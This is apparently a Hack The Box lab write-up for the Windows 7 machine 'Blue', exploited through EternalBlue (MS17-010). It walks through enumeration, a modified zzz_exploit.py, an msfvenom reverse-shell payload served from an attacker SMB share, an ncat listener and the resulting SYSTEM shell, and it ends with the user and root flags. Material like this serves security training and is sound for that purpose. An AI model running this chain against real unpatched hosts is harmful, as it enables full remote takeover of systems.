<- HTB

Blue


7 minutes to read

Blue
Hack The Box. Windows. Easy machine. This machine exposes SMB version 1, which is vulnerable to EternalBlue. Once the exploit is done, we get access as Administrator
  • OS: Windows
  • Difficulty: Easy
  • IP Address: 10.10.10.40
  • Release: 28 / 07 / 2017

Port scanning

# Nmap 7.92 scan initiated as: nmap -sC -sV -o nmap/targeted 10.10.10.40 -p 135,139,445,49152,49153,49154,49155,49156,49157  
Nmap scan report for 10.10.10.40
Host is up (0.097s latency).

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time:
| smb2-security-mode:
|   2.1:
|_    Message signing enabled but not required
| smb2-time:
|   date:
|_  start_date:
|_clock-skew: mean: -19m57s, deviation: 34m36s, median: 1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done -- 1 IP address (1 host up) scanned in 71.62 seconds

This machine has ports 135 (MS-RPC), 139 and 445 (SMB) open, within others.

$ crackmapexec smb 10.10.10.40
SMB         10.10.10.40     445    HARIS-PC         [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:HARIS-PC) (domain:haris-PC) (signing:False) (SMBv1:True)

Enumeration

If we take a look at the version of SMB (SMBv1), with no signing, we know that we can perform an attack called EternalBlue (CVE-2017-0144). Also, the name of the machine (Blue) is a hint.

We are able to list some shares in SMB using a null session:

$ smbclient -L 10.10.10.40 -N

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Share           Disk
        Users           Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.40 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)  
Unable to connect with SMB1 -- no workgroup available

Let’s run the EternalBlue attack using MS17-010. For that, we need to use Python version 2.7. The best way is with a Docker container:

$ docker run -v "$(pwd):/opt" -it python:2.7 bash
root@2955c01b9358:/# cd /opt
root@2955c01b9358:/opt# cd MS17-010/
root@2955c01b9358:/opt/MS17-010# ls -la
total 204
drwxr-xr-x 22 root root   704 Jul 15 13:26 .
drwxr-xr-x  3 root root    96 Jul 15 13:26 ..
drwxr-xr-x 12 root root   384 Jul 15 13:26 .git
-rw-r--r--  1 root root 27786 Jul 15 13:26 BUG.txt
-rw-r--r--  1 root root  3367 Jul 15 13:26 README.md
-rw-r--r--  1 root root  2495 Jul 15 13:26 checker.py
-rw-r--r--  1 root root 25722 Jul 15 13:26 eternalblue_exploit7.py  
-rw-r--r--  1 root root 24079 Jul 15 13:26 eternalblue_exploit8.py
-rw-r--r--  1 root root  3804 Jul 15 13:26 eternalblue_poc.py
-rw-r--r--  1 root root  1544 Jul 15 13:26 eternalchampion_leak.py
-rw-r--r--  1 root root  2591 Jul 15 13:26 eternalchampion_poc.py
-rw-r--r--  1 root root  5936 Jul 15 13:26 eternalchampion_poc2.py
-rw-r--r--  1 root root  1651 Jul 15 13:26 eternalromance_leak.py
-rw-r--r--  1 root root   948 Jul 15 13:26 eternalromance_poc.py
-rw-r--r--  1 root root  5107 Jul 15 13:26 eternalromance_poc2.py
-rw-r--r--  1 root root  1865 Jul 15 13:26 eternalsynergy_leak.py
-rw-r--r--  1 root root  3022 Jul 15 13:26 eternalsynergy_poc.py
-rw-r--r--  1 root root  1110 Jul 15 13:26 infoleak_uninit.py
-rw-r--r--  1 root root 16669 Jul 15 13:26 mysmb.py
-rw-r--r--  1 root root  1846 Jul 15 13:26 npp_control.py
drwxr-xr-x  5 root root   160 Jul 15 13:26 shellcode
-rw-r--r--  1 root root 43417 Jul 15 13:26 zzz_exploit.py

Now we need to install impacket (pip install impacket). Next, we can check that the machine is vulnerable using checker.py:

root@2955c01b9358:/opt/MS17-010# python checker.py
checker.py <ip>
root@2955c01b9358:/opt/MS17-010# python checker.py 10.10.10.40  
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED

It doesn’t appear to be vulnerable. But let’s use guest as the username (we need to modify the script):

root@2955c01b9358:/opt/MS17-010# python checker.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (64 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))  
lsarpc: Ok (64 bit)
browser: Ok (64 bit)

Alright, much better.

SMB exploitation

At this moment, we can use zzz_exploit.py to compromise the machine (we need to use guest as username again):

root@2955c01b9358:/opt/MS17-010# python zzz_exploit.py
zzz_exploit.py <<p> [pipe_name]
root@2955c01b9358:/opt/MS17-010# python zzz_exploit.py 10.10.10.40  
Target OS: Windows 7 Professional 7601 Service Pack 1
Using named pipe: browser
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa8003e0e690
SESSION: 0xfffff8a003574a60
FLINK: 0xfffff8a008391048
InParam: 0xfffff8a00870115c
MID: 0x802
unexpected alignment, diff: 0x-370fb8
leak failed... try again
CONNECTION: 0xfffffa8003e0e690
SESSION: 0xfffff8a003574a60
FLINK: 0xfffff8a008635048
InParam: 0xfffff8a00872a15c
MID: 0x807
unexpected alignment, diff: 0x-f5fb8
leak failed... try again
CONNECTION: 0xfffffa8003e0e690
SESSION: 0xfffff8a003574a60
FLINK: 0xfffff8a0087a5088
InParam: 0xfffff8a00873e15c
MID: 0x903
unexpected alignment, diff: 0x66088
leak failed... try again
CONNECTION: 0xfffffa8003e0e690
SESSION: 0xfffff8a003574a60
FLINK: 0xfffff8a0087b3088
InParam: 0xfffff8a0087ad15c
MID: 0x903
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
creating file c:\pwned.txt on the target
Done

Great, it worked. But it only created a file at C:\pwned.txt. In order to get Remote Code Execution (RCE), we can expose a malicious binary file using an SMB server and run it:

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.17.44 LPORT=4444 -f exe -o pwn.exe  
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: pwn.exe

Now we need to modify a bit the exploit. Specifically, this function must be set like this:

def service_exec(a, v):
   pass

def smb_pwn(conn, arch):
    #smbConn = conn.get_smbconnection()

    #print('creating file c:\\pwned.txt on the target')
    #tid2 = smbConn.connectTree('C$')
    #fid2 = smbConn.createFile(tid2, '/pwned.txt')
    #smbConn.closeFile(tid2, fid2)
    #smbConn.disconnectTree(tid2)

    #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
    service_exec(conn, r'cmd /c \\10.10.17.44\smbFolder\pwn.exe')
    # Note: there are many methods to get shell over SMB admin session
    # a simple method to get shell (but easily to be detected by AV) is  
    # executing binary generated by "msfvenom -f exe-service ..."

Then, we start the SMB server with smbserver.py (Impacket) and run the exploit. If it does not work, we can use one of the pipes listed with checker.py (samr, lsarpc, browser…):

$ impacket-smbserver smbFolder "$(pwd)"
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0  
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

root@2955c01b9358:/opt/MS17-010# python zzz_exploit.py 10.10.10.40 samr  
Target OS: Windows 7 Professional 7601 Service Pack 1
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa80038c3020
SESSION: 0xfffff8a0085478a0
FLINK: 0xfffff8a0080cc048
InParam: 0xfffff8a00872a15c
MID: 0x3803
unexpected alignment, diff: 0x-65efb8
leak failed... try again
CONNECTION: 0xfffffa80038c3020
SESSION: 0xfffff8a0085478a0
FLINK: 0xfffff8a0087b2088
InParam: 0xfffff8a0087a515c
MID: 0x3903
unexpected alignment, diff: 0xc088
leak failed... try again
CONNECTION: 0xfffffa80038c3020
SESSION: 0xfffff8a0085478a0
FLINK: 0xfffff8a0087d2088
InParam: 0xfffff8a0087cc15c
MID: 0x3903
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
Opening SVCManager on 10.10.10.40.....
Creating service zVPI.....
Starting service zVPI.....
The NETBIOS connection with the remote host timed out.
Removing service zVPI.....
ServiceExec Error on: 10.10.10.40
Unexpected answer from server: Got 46, Expected 47
Done

We receive the connection in the SMB server:

$ impacket-smbserver smbFolder "$(pwd)"
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0  
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.40,49197)
[*] AUTHENTICATE_MESSAGE (\,HARIS-PC)
[*] User HARIS-PC\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[-] Unknown level for query path info! 0x109
[-] Unknown level for query path info! 0x4
[-] Unknown level for query path info! 0x109

The binary pwn.exe is run and we get a shell as nt authority\system:

$ rlwrap ncat -nlvp 4444
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.40.
Ncat: Connection from 10.10.10.40:49198.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.  

C:\Windows\system32>whoami
nt authority\system

At this point, we can read both user.txt and root.txt flags:

C:\Windows\system32>dir C:\Users
 Volume in drive C has no label.
 Volume Serial Number is BE92-053B

 Directory of C:\Users

21/07/2017  07:56    <DIR>          .
21/07/2017  07:56    <DIR>          ..
21/07/2017  07:56    <DIR>          Administrator
14/07/2017  14:45    <DIR>          haris
12/04/2011  08:51    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)   2,691,747,840 bytes free

C:\Windows\system32>type C:\Users\haris\Desktop\user.txt
bb50fc9a421df6dc53a95fd7a5c4bfe6

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt  
fd999003d610c8fe77d56868651ba5d3